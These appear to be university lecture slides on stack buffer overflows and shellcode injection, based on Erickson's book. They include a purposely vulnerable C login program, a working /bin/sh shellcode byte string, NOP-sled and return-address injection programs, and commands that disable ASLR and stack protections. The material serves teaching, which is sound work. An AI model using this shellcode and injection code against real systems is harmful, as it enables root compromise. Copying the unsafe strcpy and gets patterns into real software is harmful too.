Shellcode
Georgia Tech ECE6612 Computer Network Security
Reference: "Hacking: The Art of Exploitation," Jon Erickson, 2nd ed., ISBN-13: 978-1-59327-144-2
Reviewed by John Copeland 3/30/14

A computer is exploited ("hacked") if an unauthorized person gains access to the computer's data and computing resources. This can be done by:
1. discovering a valid username and password (e.g., guessing or social engineering),
2. injecting crafted data into a vulnerable program to make it do things it should not do (e.g., SQL injection to extract private data, or a "buffer overflow" to alter data),
3. injecting "shellcode" into the computer's memory, and then getting the computer to execute that code.

These slides will demo and discuss the second and third techniques:
1. What is "shellcode"?
2. How can it be injected?
3. How can it be run?

These slides will build up a foundation for further study using the book "Hacking: The Art of Exploitation," 2nd ed., by Jon Erickson*.

Once techniques are known, defenses are incorporated. The hacker community then develops new techniques, and the cycle repeats. The book discusses the technological basis for past exploits, and details several cycles of hackers versus operating system developers.

Neither the book nor these slides show specific techniques that can be used against current, updated operating systems. The book does show how to construct a program for testing another program's susceptibility to buffer overflows, illustrating how hackers continually find new vulnerabilities.

"Honey Pots" are computers set up to attract attacks so that the newest exploit code can be studied. The best code today uses sophisticated encryption and obfuscation techniques to prevent disassembly. Observing the network activity of an infected computer often does provide valuable information, especially if the covert channel techniques being used can be discovered.
*www.nostarchpress.com

Vulnerabilities Fixed in Two Versions of the SeaMonkey Browser (Firefox with Editing)

Fixed in SeaMonkey 2.0.12
MFSA 2011-10  CSRF risk with plugins and 307 redirects
MFSA 2011-08  ParanoidFragmentSink allows javascript: URLs in chrome docs
MFSA 2011-07  Memory corruption during text run construction (Windows)
MFSA 2011-06  Use-after-free error using Web Workers
MFSA 2011-05  Buffer overflow in JavaScript atom map
MFSA 2011-04  Buffer overflow in JavaScript upvarMap
MFSA 2011-03  Use-after-free error in JSON.stringify
MFSA 2011-02  Recursive eval call causes confirm dialogs to evaluate to true
MFSA 2011-01  Miscellaneous memory safety hazards (rv:1.9.2.14/ 1.9.1.17)

Fixed in SeaMonkey 2.0.11
MFSA 2010-84  XSS hazard in multiple character encodings
MFSA 2010-83  Location bar SSL spoofing using network error page
MFSA 2010-82  Incomplete fix for CVE-2010-0179 [see http://cve.mitre.org/cve/]
MFSA 2010-81  Integer overflow vulnerability in NewIdArray
MFSA 2010-80  Use-after-free error with nsDOMAttribute MutationObserver
MFSA 2010-79  Java security bypass from LiveConnect loaded via data: URL refresh
MFSA 2010-78  Add support for OTS font sanitizer
MFSA 2010-77  Crash and remote code execution using HTML tags inside a XUL tree
MFSA 2010-76  Chrome privilege escalation with window.open and <isindex> element
MFSA 2010-75  Buffer overflow while line breaking after document.write with long string
MFSA 2010-74  Miscellaneous memory safety hazards (rv:1.9.2.13/ 1.9.1.16)

The C Programming Language by Brian W. Kernighan and Dennis M. Ritchie*
Developed along with UNIX in the early 1970s at Bell Labs, Murray Hill, NJ

    #include <time.h>
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/stat.h>

    char progid[80] = "square_it.c by John Copeland 4/1/2011" ;

    int do_square( int x )   // "x" here is a local variable, stored in a different
    {                        // location (on the stack) from the "x" in main
        x=x*x;
        return( x ) ;
    }

    int main(int argc, char * argv[ ])
    {
        int x, y ;           // modern: replace "int" with "int32_t"
        char buf[100] ;
        printf("\n%s\n", progid ) ;
        while(1)
        {
            printf("\n Type number (q = quit) : ") ;
            gets( buf ) ;    // unsafe: no bounds check (see the warning in the run below)
            if( buf[0] == 'q' ) break ;
            x = atoi( buf ) ;
            y = do_square( x ) ;
            printf(" The square of %d is %d\n", x, y );
        }
        return( 0 ) ;
    }

    $ gcc -Wall -o square_it square_it.c
    $ ./square_it
    square_it.c by John Copeland 4/1/2011
    warning: this program uses gets(), which is unsafe.
     Type number (q = quit) : 2
     The square of 2 is 4
     Type number (q = quit) : 3
     The square of 3 is 9
     Type number (q = quit) : q
    $

*Prentice Hall; ed 2 (1988), ISBN-10: 0131103628, ISBN-13: 978-0131103627, $48
Handy reference: http://www.acm.uiuc.edu/webmonkeys/book/c_guide/ (dated 1997)

Integer and Character Declarations: Old-Style Length in Bits, by CPU Type

Variable Type      DEC PDP-11   Honeywell 6000   IBM 370   Interdata 8/32   32-bit Intel PC (IA32)
char                    8              9             8            8                  8
short int              16             36            16           16                 16
int                    16             36            32           32                 32
long int               32             36            32           32                 32
long long int          32             36            32           32                 64
float (double/2)       64             36            32           64                 32

    // modern style: "int x ;" can be replaced by "int32_t x ;"
    #include <stdint.h>
    int32_t x ;
    uint8_t c ;

C without memory pointers is no C at all

    int64_t X, *P, A[10] ;   // int64_t replaces "long long"
    char S[100] ;            // string up to 99 chars, plus the terminating 0 (null) byte

Kept in Symbol Table                             In Executable Program
Name   Type of Variable                          Memory Allocated (bytes)
X      8-byte integer                            200-207, is the value of X
P      4-byte pointer to 8-byte integer          210-213, for memory-address
A      4-byte pointer to 8-byte integer          20-99, for 10 8-byte integers
S      4-byte pointer to 1-byte character        100-199, for 100 1-byte characters (integers)

Equivalents: X and *( &X )  -also-  S[10] and *(S+10)
after P = &X :  X and *P and P[0] and *(P + 0 )
"&" means "address of _", "*" means "value pointed to by _"

How Programs Are Stored in Memory, and How Subroutine Arguments Are Put on the Stack

Process Memory, from Lowest Address to Highest Address:
    Text or Code Segment
    Data Segment
    BSS Segment (data)
    Heap Segment   (grows toward higher addresses)
    Stack Segment  (grows toward lower addresses)

Stack Frame (created by a subroutine or function call):
    Return-Value Pointer
    Local Variables (e.g.): char buffer[10], int flag
    Saved Frame Pointer
    Return Instruction Ptr †
    Subroutine Input Arguments (passed by value)

† An exploit modifies this address to point at shellcode; when done, the shellcode can return (set the program counter) to the original address.

Erickson pp. 69-75

Subroutine Calls

Program Counter (PC or EIP)    Text (Code) Segment
                               main( )
    10000 ->                       y = do_square( x )
    10008 ->                       printf( … )
                               do_square( )
    40000 ->                       x=x*x
    40008 ->                       return( x )

Stack, Data or BSS Segment:
    main( ) variables:  x: 2    y: _ -> 4
    Stack Frame for do_square( ):
        Buffer, flags
        Return Value Ptr
        Argument x: 2 -> 4
        Saved Frame Pointer
        PC return: 10008
        Input Argument 2

A subroutine call adds memory locations to the top of the stack, to hold all the local variables and the return value for the Program Counter (and Stack Pointer).

Strings in C

A string is an array of characters, terminated by a null byte ('\0'). C does not store the length, or maximum length, of a string.
Frequent coding error: forgetting that S below can only hold 9 characters.

    char S[10], c='a', T[ ]="predefined", A[3][4]={"yes","no","?"}, *P;

Memory:        0000000000apredefined0yes0no00?000PPPP    // each char is a byte
Program Line:  printf("Results: %c.%s.\n", c, T ) ;
Results:       a.predefined.
Program Line:  gets( S ) ;    // input from keyboard, note S is a char ptr
User types:    "abcdefghijI GOT YOU !"    // > 10 characters
Memory:        abcdefghijI GOT YOU !0yes0no00?000PPPP    // each char is a byte
Program Line:  printf("Results: %c.%s.\n", c, T ) ;
Results:       I. GOT YOU !.
Cure:          fgets( S, sizeof(S), stdin ) ;    // stores at most 9 characters plus the terminating null

We can see that a buffer overflow will mess up data, but how do we 1) put executable code in a string, and 2) execute it?

Erickson pp. 5-114

Stack Buffer-Overflow

    // authenticate_me.c should grant access to only "john" or "cope"
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>

    int check_auth( char *password )
    {
        char pw_buffer[16] ;
        int auth_flag = 0 ;
        strcpy( pw_buffer, password ) ;           // string copy, no length check (the vulnerability)
        if( strcmp( pw_buffer, "john" ) == 0 )    // string compare
            auth_flag = 1 ;
        if( strcmp( pw_buffer, "cope" ) == 0 )    // string compare
            auth_flag = 1 ;
        return( auth_flag ) ;
    }

    int main( int argc, char * argv[ ] )
    {
        if( argc < 2 )                            // guard: do not pass a NULL argv[1] to check_auth
        {
            printf("Usage: %s <password>\n", argv[ 0 ] ) ;
            return( 1 ) ;
        }
        if( check_auth( argv[ 1 ] ) )             // if return value != 0
            printf(" ### Access Granted ### ") ;  // for "john" or "cope"
        else
            printf(" ### Access Denied ### ") ;   // anything else
        return( 0 ) ;
    }

Erickson p. 122

Testing "Authenticate_Me"

    $ ./authenticate_me john
     ### Access Granted ###
    $ ./authenticate_me cope
     ### Access Granted ###
    $ ./authenticate_me nobody
     ### Access Denied ###
    $ ./authenticate_me xxxxxxxxxxxxxxxx
     ### Access Granted ###                  <- Overwriting "auth_flag"
    $ ./authenticate_me xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Segmentation fault                       <- Overwriting PC return value in the preceding stack frame.
    $

Hackers use programs that automatically try all lengths of input to find a length that does what they want.

Fuzzers

A "Fuzzer" is a program that generates quasi-random data input to a program to test for unanticipated problems. For example, putting increasingly long command-line arguments into "Authenticate-Me" would show a range that produced segmentation faults, then a range that worked to get authenticated.

Black-box Fuzzer: produces random input data.
White-box Fuzzer: uses algorithms to increase the code coverage for testing known code.

Shellcode

"Shellcode" is binary code that will execute without being processed by a "Loader".
1. Must make kernel system calls directly (no standard libraries).
2. Must use absolute or relative jumps (no relocatable jumps).
3. Must be written using assembly language, and with a limited set of commands (e.g., no labels).

Development can be helped by looking at assembly code generated by the C compiler, using the gdb debugger.

The original shellcode (shown later) starts a shell (e.g., /bin/sh) running so that a command prompt is available. If the vulnerable program is a SUID program (e.g., passwd), then the shell user is "root." Now "shellcode" has come to include any similar code with other functions (e.g., installing a back door).

Erickson pp. 281-318

Hooking Code

Program Counter (PC or EIP)    Text (Code) Segment
                               main( )
    10000 ->                       y = do_square( x )
    10008 ->                       printf( … )
                               do_square( )
    40000 ->                       x=x*x
    40008 ->                       return( x )

Stack (SP -> top):
    buffer (unused)
    Return Value: 4
    Argument x: 2 -> 4
    Saved Frame Pointer
    PC return: 80000   (Later PC Return)
    Input Argument 2
    Previous Stack Frame

Shellcode (injected as data):
    Sled of NOP's
    80000 ->  starting instruction
              more instructions
              jump 10008

Data Overflow to Inject New "PC Return":
    Shellcode, then Repeated Address (hopefully -> sled)

Exploit code that installs shellcode must:
    Get the PC return value from the stack for the final "jump" instruction (or let it crash later).
    Know where the shellcode has been written in memory, to reset the PC return.
The shellcode can reset the stack based on the current SP and SFP values.
Putting Binary Shellcode into a String, on Command Line

    // type_shellcode.c
    // compile: gcc type_shellcode.c -o type_shellcode
    // output to stdout a (4 x argv[1])-byte sled, shell code, and then argv[2]
    // start addresses argv[3-6]:  ./type_shellcode 10 20 191 255 248 92
    //     40-byte sled, shellcode, 20 times 0xbffff85c *
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/stat.h>

    char shellcode[ ] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
        "\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
        "\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80";           // 35 bytes + '\x00'

    int main(int argc, char * argv[ ])
    {
        int i , n ;
        char c[4] ;

        // Build sled: 4 x 10 = 40 NOPs
        n = 4 * atoi( argv[ 1 ] ) ;                       // n = 40
        for(i = 0; i < n ; i++) printf("%c",'\x90');      // build sled of NOPs

        // Print shellcode
        printf("%s", shellcode ) ;

        // Build block: 20 return addresses
        c[0]=atoi(argv[3]); c[1]=atoi(argv[4]);           // 191 255 = hex bf ff
        c[2]=atoi(argv[5]); c[3]=atoi(argv[6]);           // 248 92 = hex f8 5c
        n = atoi( argv[ 2 ] ) ;                           // n = 20
        for(i = 0; i < n ; i++)
            printf("%c%c%c%c", c[0],c[1],c[2],c[3]);      // start addresses
        return( 0 ) ;
    }

Usage:
    > ./authenticate_me $(./type_shellcode 10 20 191 255 248 92 )
    // To run, you must use gdb to find the right value of the starting address.
    // bash shell expands $( ./x ) to output of program ./x

*This byte order is for a G4 CPU (big-endian). For an Intel CPU (little-endian), reverse the order of the address-byte integers.
To see where pw_buffer is stored, add a line:

    printf(" ======= &pw_buffer = %x = %u\n", (unsigned int) &pw_buffer, (unsigned int) &pw_buffer ) ;

and comment out other printf() lines:

    $ ./authenticate_me john
     ======= &pw_buffer = bfe27540 = 3,219,289,408
    $ ./authenticate_me john
     ======= &pw_buffer = bfecb010 = 3,219,959,824
    $ ./authenticate_me john
     ======= &pw_buffer = bfe35480 = 3,219,346,560
    $ ./authenticate_me john
     ======= &pw_buffer = bfe7b720 = 3,219,633,952
    $ ./authenticate_me john
     ======= &pw_buffer = bff71840 = 3,220,641,856
    $ ./authenticate_me john
     ======= &pw_buffer = bff96ad0 = 3,220,794,064
    $ ./authenticate_me john
     ======= &pw_buffer = bffeaab0 = 3,221,138,096

Address space layout randomization (ASLR)
Stack overflow injection is now difficult because the address of the stack frame varies over a range of about 2,000,000 bytes each time the modified program is run.
However, an attack only needs to work once. By automatically trying up to a million times, a single hit is probable, and that can install a back door to root. (see pp. 384-391)

Run a program with execle() to limit the Environment. Put the shellcode into the only Environment string, env[0]. The overflow string (buffer) only has to have the starting address (ret), repeated many times.*

    // execle_run.c
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdint.h>

    int main(int argc, char *argv[ ])
    {
        char *env[2] = {"\x31\xc0\x31 … \xcd\x80", NULL};   // last entry must be NULL
        uint32_t i, ret = 0xbffffffa;        // address of env[0] in "authenticate_me"
        char buffer[161] ;
        for(i=0;i<160;i+=4)
            *( (uint32_t*) (buffer+i) ) = ret ;   // put in 4-byte address
        buffer[160] = 0 ;
        execle("./authenticate_me", "authenticate_me", buffer, NULL, env );
        return( 0 ) ;
    }

* Erickson pp. 149-150
** With today's (2011) Linux, "ret" has to match a different value on each run, even when execle() is used.

Buffer overflows can be used to:
    Alter data later used in control statements.
        Basic problem: Input data and control data are both kept on the stack.
    Inject shellcode and cause it to be executed.
        Basic problem: Input data and Program-Counter return values are kept on the stack. The PC can point to a stack address.

Other types of overflows:
    Stack segment overflow (p. 150)
    Function pointer overflow (p. 156)
    Printf format strings (p. 171)
        Examine stack values
        Read arbitrary values from memory
        Write arbitrary values to memory

Present-day C compilers (gcc) and Linux are designed to defeat most of the techniques discussed in "Hacking: The Art of Exploitation". For those of you who would like to experiment with code that has vulnerabilities, you can turn some of these protections off in the OS, and in the gcc compiler:

*** To disable ASLR (Address Space Layout Randomization):
This change is immediate on the running OS kernel (run with root privileges).
    echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
    (when done, restore the previous value, e.g.: echo 1 | sudo tee /proc/sys/kernel/randomize_va_space ; many current distributions use 2)
With "sudo echo 0 > file", the redirection is performed by the non-root shell and fails, so pipe into "sudo tee" or use a root shell.

*** To turn off gcc protections when you compile your program, use options:
    -fno-stack-protector        disables stack canaries
    -fno-stack-protector-all
    -fno-address-sanitizer      turns off AddressSanitizer, a memory error detector
    -fno-memsafety
    -z execstack                makes the stack executable (disables non-executable-stack protection)
    -fno-mudflap                disables checks on risky pointer operations that may be used in overflows (runtime memory access errors are then not caught)
Option names vary between compilers and versions; check your compiler's documentation for the ones it accepts.

Example gcc compile:
    > gcc -g -fno-stack-protector -z execstack -Wall -o program program.c
-Wall shows all warnings, always good to have; -g so you can use gdb to show C code lines and variable locations.

Information provided by Dr. Selcuk Uluagac, GT ECE (now at Fla. International U.)
Networking, Chapter 4
Concise explanation of sockets, protocol stack, formats, …
Simple code for:
    Server program (p.204)
    Web Server program (p.213)
    Network traffic sniffing (p.224)
Source code for Nemesis (arp spoofing, p.245)
SYN flood, Ping of Death, Ping Flood, …
TCP/IP hijacking (p.258)
Port scanning (p.264)
Pro-active defense (p.267)
Port-binding shellcode (p.278)

Shellcode, Chapter 5
Using ASM to write assembly code (p.281)
Linux system calls (p.283)
Investigating with gdb (p.289)
Removing null bytes (p.290)
Shell-spawning shellcode (the original, p.295)
Port-binding shellcode (for backdoors, p.303)
Connect-back shellcode (defeat firewalls, p.314)

Countermeasures, Chapter 6
Countermeasures that detect intrusion (p.320)
Log files (p.334)
Rootkit techniques (p.348)
Socket reuse (p.355)
Payload smuggling (hiding signatures, p.359)
Polymorphic Printable ASCII shellcode (p.366)
Non-executable stack (available, not used, p.376)
Randomized stack space (seen earlier, p.379)
Defeating above (p.388)

Cryptology, Chapter 7
Basics (p.393)
Symmetric encryption (p.398)
Asymmetric encryption (p.400)
Hybrid Ciphers (man-in-the-middle attacks, p.406)
SSH attacks
Password Cracking (p.418)
Dictionary attacks, Rainbow Tables
Wireless 802.11b WiFi encryption (p.436)
WPA attacks - not covered

Conclusion, Chapter 8 (pp. 452-453)